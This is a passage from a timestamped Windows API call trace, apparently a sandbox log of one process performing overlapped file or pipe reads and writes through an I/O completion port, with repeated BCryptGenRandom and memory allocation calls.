lpOverlapped=0x1ff1e60) returned 1 [0204.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.069] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0204.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0204.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.104] free (_Block=0x3e305b8) [0204.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.104] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.105] free (_Block=0x1fa92e8) [0204.105] free (_Block=0x1fa2ed8) [0204.105] free (_Block=0x1fa91d0) [0204.105] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.105] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.124] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.124] CloseHandle (hObject=0x308) returned 1 [0204.124] free (_Block=0x3d70450) [0204.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0204.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0204.132] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.132] free (_Block=0x3e305b8) [0204.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0204.132] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0204.132] free (_Block=0x1fa9400) [0204.132] free (_Block=0x77d7a8) [0204.132] free (_Block=0x1fa92e8) [0204.132] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.133] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.141] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.141] CloseHandle (hObject=0x308) returned 1 [0204.141] free (_Block=0x3d70450) [0204.142] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0204.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0204.148] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.148] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.148] free (_Block=0x3e305b8) [0204.148] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0204.148] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0204.149] free (_Block=0x1fa9400) [0204.149] free (_Block=0x77d7a8) [0204.149] free (_Block=0x1fa92e8) [0204.149] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.149] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.157] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xcc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.157] CloseHandle (hObject=0x308) returned 1 [0204.157] free (_Block=0x3d70450) [0204.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.164] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.164] CloseHandle (hObject=0x2a8) returned 1 [0204.164] free (_Block=0x3df0008) [0204.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0204.166] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.688] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x124, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.688] CloseHandle (hObject=0x2a8) returned 1 [0205.689] free (_Block=0x1ff1e60) [0205.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.698] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.698] free (_Block=0x3e305b8) [0205.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.698] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.699] free (_Block=0x1fa91d0) [0205.699] free (_Block=0x1fa2ed8) [0205.699] free (_Block=0x1fa90b8) [0205.699] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.700] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.721] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x497, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.722] CloseHandle (hObject=0x2a8) returned 1 [0205.722] free (_Block=0x1ff1e60) [0205.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.731] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.732] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.732] free (_Block=0x3e305b8) [0205.732] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.732] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.732] free (_Block=0x1fa91d0) [0205.732] free (_Block=0x1fa2ed8) [0205.732] free (_Block=0x1fa90b8) [0205.732] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.733] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.765] CloseHandle (hObject=0x3cc) returned 1 [0205.765] free (_Block=0x3df0008) [0205.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.856] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.857] CloseHandle (hObject=0x3cc) returned 1 [0205.857] free (_Block=0x3df0008) [0205.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.866] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.866] free (_Block=0x3e305b8) [0205.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.866] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.867] free (_Block=0x1fa91d0) [0205.867] free (_Block=0x1fa2ed8) [0205.867] free (_Block=0x1fa90b8) [0205.867] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.867] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.890] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x617, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.890] CloseHandle (hObject=0x3cc) returned 1 [0205.891] free (_Block=0x3df0008) [0205.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.915] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.915] free (_Block=0x3e305b8) [0205.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.915] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.915] free (_Block=0x1fa91d0) [0205.915] free (_Block=0x1fa2ed8) [0205.915] free (_Block=0x1fa90b8) [0205.915] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.916] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.926] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x25b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.926] CloseHandle (hObject=0x3cc) returned 1 [0205.927] free (_Block=0x3df0008) [0205.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, 